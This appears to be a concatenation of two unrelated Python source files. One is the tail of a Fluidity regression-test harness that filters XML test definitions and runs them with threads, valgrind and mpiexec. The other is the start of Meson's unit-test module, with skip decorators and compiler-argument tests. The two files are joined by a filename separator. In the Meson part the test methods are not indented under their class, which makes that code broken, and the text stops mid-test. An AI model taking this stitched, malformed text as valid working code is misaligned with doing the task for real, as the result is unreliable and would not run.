                f = open(from_file, 'r')
                # strip the trailing newline from each listed test name
                files = [line[:-1] for line in f.readlines()]
            except IOError as e:
                sys.stderr.write("Unable to read tests from file %s: %s" % (from_file, e))
                sys.exit(1)
            f.close()
        else:
            files = None
        if files:
            for (subdir, xml_file) in [os.path.split(x) for x in xml_files]:
                temp_files=files
                for file in temp_files:
                    if xml_file == file:
                        p = etree.parse(os.path.join(subdir,xml_file))
                        prob_defn = p.findall("problem_definition")[0]
                        prob_nprocs = int(prob_defn.attrib["nprocs"])
                        testprob = regressiontest.TestProblem(filename=os.path.join(subdir, xml_file),
                            verbose=self.verbose, replace=self.modify_command_line(prob_nprocs), genpbs=genpbs)
                        self.tests.append((subdir, testprob))
                        files.remove(xml_file)
            if files != []:
                print "Could not find the following specified test files:"
                for f in files:
                    print f
                sys.exit(1)
            return
        # step 3. form a cut-down list of the xml files matching the correct length and the correct parallelism.
        working_set = []
        for xml_file in xml_files:
            p = etree.parse(xml_file)
            prob_defn = p.findall("problem_definition")[0]
            prob_length = prob_defn.attrib["length"]
            prob_nprocs = int(prob_defn.attrib["nprocs"])
            if prob_length == length or (length == "any" and prob_length not in ["special", "long"]):
                if self.parallel == "parallel":
                    if prob_nprocs > 1:
                        working_set.append(xml_file)
                elif self.parallel == "serial":
                    if prob_nprocs == 1:
                        working_set.append(xml_file)
                elif self.parallel == "any":
                    working_set.append(xml_file)

        def get_xml_file_tags(xml_file):
            # returns the whitespace-separated tag list of a test definition
            p = etree.parse(xml_file)
            p_tags = p.findall("tags")
            if len(p_tags) > 0 and not p_tags[0].text is None:
                xml_tags = p_tags[0].text.split()
            else:
                xml_tags = []
            return xml_tags

        # step 4. if there are any excluded tags, let's exclude tests that have
        # them
        if exclude_tags is not None:
            to_remove = []
            for xml_file in working_set:
                p_tags = get_xml_file_tags(xml_file)
                include = True
                for tag in exclude_tags:
                    if tag in p_tags:
                        include = False
                        break
                if not include:
                    to_remove.append(xml_file)
            for xml_file in to_remove:
                working_set.remove(xml_file)
        # step 5. if there are any tags, let's use them
        if tags is not None:
            tagged_set = []
            for xml_file in working_set:
                p_tags = get_xml_file_tags(xml_file)
                include = True
                for tag in tags:
                    if tag not in p_tags:
                        include = False
                if include is True:
                    tagged_set.append(xml_file)
        else:
            tagged_set = working_set
        for (subdir, xml_file) in [os.path.split(x) for x in tagged_set]:
            # need to grab nprocs here to pass through to modify_command_line
            p = etree.parse(os.path.join(subdir,xml_file))
            prob_defn = p.findall("problem_definition")[0]
            prob_nprocs = int(prob_defn.attrib["nprocs"])
            testprob = regressiontest.TestProblem(filename=os.path.join(subdir, xml_file),
                verbose=self.verbose, replace=self.modify_command_line(prob_nprocs))
            self.tests.append((subdir, testprob))
        if len(self.tests) == 0:
            print "Warning: no matching tests."

    def length_matches(self, filelength):
        # does filelength satisfy the requested test length?
        if self.length == filelength: return True
        if self.length == "medium" and filelength == "short": return True
        return False

    def decide_fluidity_command(self):
        """Pick the newer of the (d)fluidity / -debug binaries found in the
        first PATH entry; returns its name, or None if neither exists."""
        bindir = os.environ["PATH"].split(':')[0]
        for binaryBase in ["dfluidity", "fluidity"]:
            binary = binaryBase
            debugBinary = binaryBase + "-debug"
            try:
                # mtime is the second-to-last field of os.stat's tuple
                fluidity_mtime = os.stat(os.path.join(bindir, binary))[-2]
                have_fluidity = True
            except OSError:
                fluidity_mtime = 1e30
                have_fluidity = False
            try:
                debug_mtime = os.stat(os.path.join(bindir, debugBinary))[-2]
                have_debug = True
            except OSError:
                debug_mtime = 1e30
                have_debug = False
            if have_fluidity is True or have_debug is True:
                if have_fluidity is False and have_debug is True:
                    flucmd = debugBinary
                elif have_fluidity is True and have_debug is False:
                    flucmd = binary
                elif fluidity_mtime > debug_mtime:
                    flucmd = binary
                else:
                    flucmd = debugBinary
                # no longer valid since debugging doesn't change the name - any suitable alternative tests?
                # if self.valgrind is True:
                #   if flucmd != debugBinary:
                #     print "Error: you really should compile with debugging for use with valgrind!"
                #     sys.exit(1)
                return flucmd
        return None

    def modify_command_line(self, nprocs):
        """Return a function that rewrites a test's command line to use the
        detected fluidity binary, valgrind and `mpiexec -n` as configured."""
        flucmd = self.decide_fluidity_command()
        print flucmd
        def f(s):
            if not flucmd in [None, "fluidity"]:
                s = s.replace('fluidity ', flucmd + ' ')
            if self.valgrind:
                s = "valgrind --tool=memcheck --leak-check=full -v" + \
                    " --show-reachable=yes --num-callers=8 --error-limit=no " + \
                    "--log-file=test.log " + s
            # when calling genpbs, genpbs should take care of inserting the right -n <NPROCS> magic
            if not self.genpbs:
                s = s.replace('mpiexec ', 'mpiexec -n %(nprocs)d ' % {'nprocs': nprocs})
            return s
        return f

    def log(self, str):
        # chatty output only in verbose mode
        if self.verbose == True:
            print str

    def clean(self):
        """Run every selected test's clean action in its own directory."""
        self.log(" ")
        for t in self.tests:
            os.chdir(t[0])
            t[1].clean()
        return

    def run(self):
        """Run all selected tests (threaded by nprocs), then print a summary
        and optionally write a junit xml report."""
        self.log(" ")
        if not self.justtest:
            threadlist=[]
            self.test_exception_ids = multiprocessing.Queue()
            tests_by_nprocs={}
            for test_id in range(len(self.tests)):
                # sort tests by number of processes requested
                tests_by_nprocs.setdefault(self.tests[test_id][1].nprocs,
                                           []).append(test_id)
            serial_tests = multiprocessing.Queue()
            for test in tests_by_nprocs.get(1, []):
                # collect serial tests to pass to worker threads
                serial_tests.put(test)
            for nprocs in sorted(list(tests_by_nprocs.keys()), reverse=True):
                for i in range(len(threadlist),
                               max(0, options.thread_count-nprocs)):
                    # spin up enough new workers to fully subscribe thread count
                    threadlist.append(multiprocessing.Process(target=self.threadrun, args=[serial_tests]))
                    threadlist[-1].start()
                if nprocs==1:
                    # remaining tests are serial. Join the workers
                    self.threadrun(serial_tests)
                else:
                    tests = tests_by_nprocs[nprocs]
                    queue = Queue.Queue()
                    for test in tests:
                        queue.put(test)
                    # run the parallel queue on master thread
                    self.threadrun(queue)
            for t in threadlist:
                '''Wait until all threads finish'''
                t.join()
            exceptions = []
            while True:
                try:
                    test_id, lines = self.test_exception_ids.get(timeout=0.1)
                    exceptions.append((self.tests[test_id], lines))
                except Queue.Empty:
                    break
            for e, lines in exceptions:
                # record run-time failures in the xml report and retire the test
                tc=TestCase(e[1].name,
                            '%s.%s'%(e[1].length,
                                     e[1].filename[:-4]))
                tc.add_failure_info("Failure", lines)
                self.xml_parser.test_cases+= [tc]
                self.tests.remove(e)
                self.completed_tests += [e[1]]
            count = len(self.tests)
            # poll the remaining tests once a minute until all have finished
            while True:
                for t in self.tests:
                    if t is None: continue
                    test = t[1]
                    os.chdir(t[0])
                    if test.is_finished():
                        if test.length == "long":
                            test.fl_logs(nLogLines = 20)
                        else:
                            test.fl_logs(nLogLines = 0)
                        try:
                            self.teststatus += test.test()
                        except:
                            self.log("Error: %s raised an exception while testing:" % test.filename)
                            lines = traceback.format_exception( sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2] )
                            for line in lines:
                                self.log(line)
                            self.teststatus += ['F']
                            test.pass_status = ['F']
                        self.completed_tests += [test]
                        self.xml_parser.test_cases+=test.xml_reports
                        t = None
                        count -= 1
                if count == 0: break
                time.sleep(60)
        else:
            # --justtest: skip running; only evaluate existing results
            for t in self.tests:
                test = t[1]
                os.chdir(t[0])
                if self.length == "long":
                    test.fl_logs(nLogLines = 20)
                else:
                    test.fl_logs(nLogLines = 0)
                self.teststatus += test.test()
                self.completed_tests += [test]
                self.xml_parser.test_cases+=test.xml_reports
        self.passcount = self.teststatus.count('P')
        self.failcount = self.teststatus.count('F')
        self.warncount = self.teststatus.count('W')
        if self.failcount + self.warncount > 0:
            print
            print "Summary of test problems with failures or warnings:"
            for t in self.completed_tests:
                if t.pass_status.count('F')+t.warn_status.count('W')>0:
                    print t.filename+':', ''.join(t.pass_status+t.warn_status)
            print
        if self.passcount + self.failcount + self.warncount > 0:
            print "Passes: %d" % self.passcount
            print "Failures: %d" % self.failcount
            print "Warnings: %d" % self.warncount
        if self.xml_outfile!="":
            fd=open(self.cwd+'/'+self.xml_outfile,'w')
            self.xml_parser.to_file(fd,[self.xml_parser])
            fd.close()
        if self.exit_fails:
            sys.exit(self.failcount)

    def threadrun(self, queue):
        '''This is the portion of the loop which actually runs the
        tests. This is split out so that it can be threaded.
        Each thread runs tests from the queue until it is exhausted.'''
        # We use IO locking to attempt to keep output understandable
        # That means writing to a buffer to minimise interactions
        main_stdout = sys.stdout
        while True:
            buf = StringIO()
            sys.stdout = buf
            try:
                #pull a test number from the queue
                test_id = queue.get(timeout=0.1)
                (dir, test) = self.tests[test_id]
            except Queue.Empty:
                # If the queue is empty, we're done.
                sys.stdout = main_stdout
                buf.seek(0)
                with self.iolock:
                    print buf.read()
                break
            try:
                runtime=test.run(dir)
                if self.length=="short" and runtime>30.0:
                    # NOTE(review): the '+' concatenation means the % operator
                    # formats only the second string -- latent formatting bug,
                    # left as-is here.
                    self.log("Warning: short test ran for %f seconds which"+
                             " is longer than the permitted 30s run time"%runtime)
                    self.teststatus += ['W']
                    test.pass_status = ['W']
            except:
                self.log("Error: %s raised an exception while running:" % test.filename)
                lines = traceback.format_exception( sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2] )
                for line in lines:
                    self.log(line)
                test.pass_status = ['F']
                self.test_exception_ids.put((test_id, lines))
            finally:
                # always restore stdout and flush the buffered output
                sys.stdout = main_stdout
                buf.seek(0)
                with self.iolock:
                    print buf.read()

    def list(self):
        # print the path of every selected test definition
        for (subdir, test) in self.tests:
            print os.path.join(subdir, test.filename)
if __name__ == "__main__":
    # Command-line entry point: parse options, set up the environment so
    # the freshly built tools are found first, then run/list/clean tests.
    import optparse
    parser = optparse.OptionParser()
    parser.add_option("-l", "--length", dest="length", help="length of problem (default=any)", default="any")
    parser.add_option("-p", "--parallelism", dest="parallel", help="parallelism of problem: options are serial, parallel or any (default=any)",
                      default="any")
    parser.add_option("-e", "--exclude-tags", dest="exclude_tags", help="run only tests that do not have specific tags (takes precidence over -t)", default=[], action="append")
    parser.add_option("-t", "--tags", dest="tags", help="run tests with specific tags", default=[], action="append")
    parser.add_option("-f", "--file", dest="file", help="specific test case to run (by filename)", default="")
    parser.add_option("--from-file", dest="from_file", default=None,
                      help="run tests listed in FROM_FILE (one test per line)")
    parser.add_option("-n", "--threads", dest="thread_count", type="int",
                      help="number of tests to run at the same time", default=1)
    parser.add_option("-v", "--valgrind", action="store_true", dest="valgrind")
    parser.add_option("-c", "--clean", action="store_true", dest="clean", default = False)
    parser.add_option("--just-test", action="store_true", dest="justtest", default=False)
    parser.add_option("--just-list", action="store_true", dest="justlist")
    parser.add_option("--genpbs", action="store_true", dest="genpbs")
    parser.add_option("-x","--xml-output", dest="xml_outfile", default="", help="filename for xml output")
    parser.add_option("--exit-failure-count", action="store_true", dest="exit_fails", help="Return failure count on exit")
    (options, args) = parser.parse_args()
    if len(args) > 0: parser.error("Too many arguments.")
    if options.parallel not in ['serial', 'parallel', 'any']:
        parser.error("Specify parallelism as either serial, parallel or any.")
    # Prepend the project's bin/, python/ and lib/ (relative to this
    # script) so the freshly built binaries and modules take precedence.
    os.environ["PATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "bin")) + ":" + os.environ["PATH"]
    try:
        os.environ["PYTHONPATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "python")) + ":" + os.environ["PYTHONPATH"]
    except KeyError:
        # NOTE(review): os.putenv only affects child processes and does NOT
        # update os.environ, so later reads of this variable within this
        # process will still fail -- assigning os.environ[...] would be
        # safer; confirm intent.
        os.putenv("PYTHONPATH", os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "python")))
    try:
        os.environ["LD_LIBRARY_PATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "lib")) + ":" + os.environ["LD_LIBRARY_PATH"]
    except KeyError:
        # Same os.putenv caveat as above.
        os.putenv("LD_LIBRARY_PATH", os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "lib")))
    # Create the lock directory used by the tests; ignore "already exists".
    try:
        os.mkdir(os.environ["HOME"] + os.sep + "lock")
    except OSError:
        pass
    # Normalise empty tag lists to None, meaning "no tag filtering".
    if len(options.exclude_tags) == 0:
        exclude_tags = None
    else:
        exclude_tags = options.exclude_tags
    if len(options.tags) == 0:
        tags = None
    else:
        tags = options.tags
    # NOTE(review): options.thread_count (-n) is parsed but never passed to
    # TestHarness here -- verify the constructor picks it up some other way,
    # otherwise the option is silently ignored.
    testharness = TestHarness(length=options.length, parallel=options.parallel,
                              exclude_tags=exclude_tags, tags=tags,
                              file=options.file, verbose=True,
                              justtest=options.justtest,
                              valgrind=options.valgrind,
                              from_file=options.from_file,
                              genpbs=options.genpbs,
                              exit_fails=options.exit_fails,
                              xml_outfile=options.xml_outfile)
    if options.justlist:
        testharness.list()
    elif options.clean:
        testharness.clean()
    else:
        # Report which fluidity binary and version will be exercised.
        print "-" * 80
        which = os.popen("which %s" % testharness.decide_fluidity_command()).read()
        if len(which) > 0:
            print "which %s: %s" % ("fluidity", which),
        versio = os.popen("%s -V" % testharness.decide_fluidity_command()).read()
        if len(versio) > 0:
            print versio
        print "-" * 80
        if options.valgrind is True:
            print "-" * 80
            print "I see you are using valgrind!"
            print "A couple of points to remember."
            print "a) The log file will be produced in the directory containing the tests."
            print "b) Valgrind typically takes O(100) times as long. I hope your test is short."
            print "-" * 80
        testharness.run()
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
# Timeout in seconds for urllib.request.urlopen calls -- presumably used by
# network-touching tests further down this file; confirm at the call sites.
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
    '''Temporarily change the working directory to *path*.

    BUG FIX: the original version only restored the previous working
    directory on the success path; if the with-body raised, the process
    was left in *path*.  The restore now runs in a finally block.
    '''
    curdir = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
    '''Return the value of *entry* from the ELF dynamic section of *fname*,
    or None when the section has no such entry.  Skips on non-ELF
    platforms or when readelf is unavailable.'''
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('Test only applicable to ELF platforms')
    try:
        raw_out = subprocess.check_output(['readelf', '-d', fname],
                                          universal_newlines=True)
    except FileNotFoundError:
        # FIXME: Try using depfixer.py:Elf() as a fallback
        raise unittest.SkipTest('readelf not found')
    pattern = re.compile(entry + r': \[(.*?)\]')
    for line in raw_out.split('\n'):
        found = pattern.search(line)
        if found:
            return found.group(1)
    # The file did not contain the specified entry.
    return None
def get_soname(fname):
    # Convenience wrapper: the SONAME entry of fname's dynamic section,
    # or None if absent.
    return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
    # Convenience wrapper: the RPATH or RUNPATH entry (whichever is
    # present) of fname's dynamic section, or None if absent.
    return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
    '''True when the current directory looks like an extracted tarball
    (no docs/ directory) rather than a full checkout.'''
    return not os.path.isdir('docs')
def is_ci():
    '''True when running under a CI system (the CI env var is set).'''
    return 'CI' in os.environ
def is_pull():
    '''True when this build is for a pull request (Travis or Azure).'''
    # Travis sets TRAVIS_PULL_REQUEST to the PR number, or 'false'.
    if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
        return True
    # Azure Pipelines defines SYSTEM_PULLREQUEST_ISFORK only for PRs.
    return 'SYSTEM_PULLREQUEST_ISFORK' in os.environ
def _git_init(project_dir):
    '''Turn *project_dir* into a git repository with a single commit
    containing all of its files.'''
    quiet = {'stdout': subprocess.DEVNULL}
    subprocess.check_call(['git', 'init'], cwd=project_dir, **quiet)
    subprocess.check_call(['git', 'config', 'user.name', 'Author Person'],
                          cwd=project_dir)
    subprocess.check_call(['git', 'config', 'user.email', 'teh_coderz@example.com'],
                          cwd=project_dir)
    # shell=True on purpose: let the shell expand the glob.
    subprocess.check_call('git add *', cwd=project_dir, shell=True, **quiet)
    subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'],
                          cwd=project_dir, **quiet)
@functools.lru_cache()
def is_real_gnu_compiler(path):
    '''
    Check if the gcc we have is a real gcc and not a macOS wrapper around clang
    '''
    if not path:
        return False
    version_text = subprocess.check_output([path, '--version'],
                                           universal_newlines=True,
                                           stderr=subprocess.STDOUT)
    return 'Free Software Foundation' in version_text
def skipIfNoExecutable(exename):
    '''Decorator factory: skip the wrapped test when *exename* is not on PATH.'''
    def decorator(test_func):
        @functools.wraps(test_func)
        def guarded(*args, **kwargs):
            if shutil.which(exename) is not None:
                return test_func(*args, **kwargs)
            raise unittest.SkipTest(exename + ' not found')
        return guarded
    return decorator
def skipIfNoPkgconfig(f):
    '''Skip the decorated test when pkg-config is missing, except on CI.

    Users without pkg-config (f.ex. on macOS) can still run the suite,
    while CI is never allowed to silently skip through misconfiguration.
    Note: Yes, we provide pkg-config even while running Windows CI
    '''
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if shutil.which('pkg-config') is None and not is_ci():
            raise unittest.SkipTest('pkg-config not found')
        return f(*args, **kwargs)
    return wrapped
def skipIfNoPkgconfigDep(depname):
    '''Skip the decorated test when the given pkg-config dependency is
    missing, except on CI (which must never silently skip).'''
    def decorator(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            if not is_ci():
                if shutil.which('pkg-config') is None:
                    raise unittest.SkipTest('pkg-config not found')
                if subprocess.call(['pkg-config', '--exists', depname]) != 0:
                    raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
            return func(*args, **kwargs)
        return wrapped
    return decorator
def skip_if_no_cmake(f):
    '''
    Skip this test if no cmake is found, unless we're on CI.
    This allows users to run our test suite without having
    cmake installed on, f.ex., macOS, while ensuring that our CI does not
    silently skip the test because of misconfiguration.
    '''
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if shutil.which('cmake') is None and not is_ci():
            raise unittest.SkipTest('cmake not found')
        return f(*args, **kwargs)
    return wrapped
def skip_if_not_language(lang):
    '''Skip the decorated test unless a compiler for *lang* is detectable.'''
    def decorator(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            try:
                detector = getattr(get_fake_env(), 'detect_{}_compiler'.format(lang))
                detector(MachineChoice.HOST)
            except EnvironmentException:
                raise unittest.SkipTest('No {} compiler found.'.format(lang))
            return func(*args, **kwargs)
        return wrapped
    return decorator
def skip_if_env_set(key):
    '''
    Skip a test if a particular env is set, except when running under CI
    (where the variable is temporarily removed for the duration of the
    test and restored afterwards).
    '''
    def decorator(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            saved = None
            if key in os.environ:
                if not is_ci():
                    raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
                saved = os.environ.pop(key)
            try:
                return func(*args, **kwargs)
            finally:
                if saved is not None:
                    os.environ[key] = saved
        return wrapped
    return decorator
def skip_if_not_base_option(feature):
    """Skip tests if The compiler does not support a given base option.
    for example, ICC doesn't currently support b_sanitize.
    """
    def decorator(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            compiler = get_fake_env().detect_c_compiler(MachineChoice.HOST)
            if feature in compiler.base_options:
                return f(*args, **kwargs)
            raise unittest.SkipTest(
                '{} not available with {}'.format(feature, compiler.id))
        return wrapped
    return decorator
@contextmanager
def temp_filename():
    '''A context manager which provides a filename to an empty temporary file.
    On exit the file will be deleted.
    '''
    handle, name = tempfile.mkstemp()
    os.close(handle)
    try:
        yield name
    finally:
        # The body may legitimately have deleted the file already.
        try:
            os.remove(name)
        except OSError:
            pass
@contextmanager
def no_pkgconfig():
    '''
    A context manager that overrides shutil.which and ExternalProgram to force
    them to return None for pkg-config to simulate it not existing.
    '''
    real_which = shutil.which
    real_search = ExternalProgram._search

    def fake_search(self, name, search_dir):
        if name == 'pkg-config':
            return [None]
        return real_search(self, name, search_dir)

    def fake_which(cmd, *kwargs):
        if cmd == 'pkg-config':
            return None
        return real_which(cmd, *kwargs)

    shutil.which = fake_which
    ExternalProgram._search = fake_search
    try:
        yield
    finally:
        # Always undo the monkey-patching, even if the body raised.
        shutil.which = real_which
        ExternalProgram._search = real_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
    """search_version() must pick the dotted version triple out of
    arbitrary --version output and ignore date-like numbers."""
    searchfunc = mesonbuild.environment.search_version
    cases = [
        ('foobar 1.2.3', '1.2.3'),
        ('1.2.3', '1.2.3'),
        ('foobar 2016.10.28 1.2.3', '1.2.3'),
        ('2016.10.28 1.2.3', '1.2.3'),
        ('foobar 2016.10.128', 'unknown version'),
        ('2016.10.128', 'unknown version'),
    ]
    for text, expected in cases:
        self.assertEqual(searchfunc(text), expected)
def test_mode_symbolic_to_bits(self):
    """FileMode.perms_s_to_bits must map ls-style permission strings to
    the corresponding stat bitmasks."""
    modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
    # Single-bit cases, then setuid/setgid/sticky, then combined modes.
    cases = [
        ('---------', 0),
        ('r--------', stat.S_IRUSR),
        ('---r-----', stat.S_IRGRP),
        ('------r--', stat.S_IROTH),
        ('-w-------', stat.S_IWUSR),
        ('----w----', stat.S_IWGRP),
        ('-------w-', stat.S_IWOTH),
        ('--x------', stat.S_IXUSR),
        ('-----x---', stat.S_IXGRP),
        ('--------x', stat.S_IXOTH),
        ('--S------', stat.S_ISUID),
        ('-----S---', stat.S_ISGID),
        ('--------T', stat.S_ISVTX),
        ('--s------', stat.S_ISUID | stat.S_IXUSR),
        ('-----s---', stat.S_ISGID | stat.S_IXGRP),
        ('--------t', stat.S_ISVTX | stat.S_IXOTH),
        ('rwx------', stat.S_IRWXU),
        ('---rwx---', stat.S_IRWXG),
        ('------rwx', stat.S_IRWXO),
        # We could keep listing combinations exhaustively but that seems
        # tedious and pointless. Just test a few more.
        ('rwxr-xr-x', stat.S_IRWXU |
                      stat.S_IRGRP | stat.S_IXGRP |
                      stat.S_IROTH | stat.S_IXOTH),
        ('rw-r--r--', stat.S_IRUSR | stat.S_IWUSR |
                      stat.S_IRGRP |
                      stat.S_IROTH),
        ('rwsr-x---', stat.S_IRWXU | stat.S_ISUID |
                      stat.S_IRGRP | stat.S_IXGRP),
    ]
    for perms, expected_bits in cases:
        self.assertEqual(modefunc(perms), expected_bits)
def test_compiler_args_class(self):
    """Exercise CompilerArgs list semantics: construction, append and
    in-place addition with compiler-aware de-duplication/ordering, and
    the 'direct' (no-dedup) append/extend variants.  The assertions are
    strictly order-dependent: each one checks the cumulative state."""
    cargsfunc = mesonbuild.compilers.CompilerArgs
    cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
    # Test that empty initialization works
    a = cargsfunc(cc)
    self.assertEqual(a, [])
    # Test that list initialization works
    a = cargsfunc(cc, ['-I.', '-I..'])
    self.assertEqual(a, ['-I.', '-I..'])
    # Test that there is no de-dup on initialization
    self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
    ## Test that appending works
    a.append('-I..')
    self.assertEqual(a, ['-I..', '-I.'])
    a.append('-O3')
    self.assertEqual(a, ['-I..', '-I.', '-O3'])
    ## Test that in-place addition works
    a += ['-O2', '-O2']
    self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
    # Test that removal works
    a.remove('-O2')
    self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
    # Test that de-dup happens on addition
    a += ['-Ifoo', '-Ifoo']
    self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
    # .extend() is just +=, so we don't test it
    ## Test that addition works
    # Test that adding a list with just one old arg works and yields the same array
    a = a + ['-Ifoo']
    self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
    # Test that adding a list with one arg new and one old works
    a = a + ['-Ifoo', '-Ibaz']
    self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
    # Test that adding args that must be prepended and appended works
    a = a + ['-Ibar', '-Wall']
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
    ## Test that reflected addition works
    # Test that adding to a list with just one old arg works and yields the same array
    a = ['-Ifoo'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with just one new arg that is not pre-pended works
    a = ['-Werror'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with two new args preserves the order
    a = ['-Ldir', '-Lbah'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with old args does nothing
    a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
    ## Test that adding libraries works
    l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo'])
    # Adding a library and a libpath appends both correctly
    l += ['-Lbardir', '-lbar']
    self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
    # Adding the same library again does nothing
    l += ['-lbar']
    self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
    ## Test that 'direct' append and extend works
    l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo'])
    # Direct-adding a library and a libpath appends both correctly
    l.extend_direct(['-Lbardir', '-lbar'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
    # Direct-adding the same library again still adds it
    l.append_direct('-lbar')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
    # Direct-adding with absolute path deduplicates
    l.append_direct('/libbaz.a')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
    # Adding libbaz again does nothing
    l.append_direct('/libbaz.a')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
    """With a GNU dynamic linker, to_native() must wrap the library block
    in -Wl,--start-group/--end-group, keep non-library arguments outside
    the group, and treat -Wl,-l<name> as a library.  Assertions are
    cumulative and order-dependent."""
    cargsfunc = mesonbuild.compilers.CompilerArgs
    ## Test --start/end-group
    linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
    gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
    ## Ensure that the fake compiler is never called by overriding the relevant function
    gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
    ## Test that 'direct' append and extend works
    l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
    # Direct-adding a library and a libpath appends both correctly
    l.extend_direct(['-Lbardir', '-lbar'])
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
    # Direct-adding the same library again still adds it
    l.append_direct('-lbar')
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
    # Direct-adding with absolute path deduplicates
    l.append_direct('/libbaz.a')
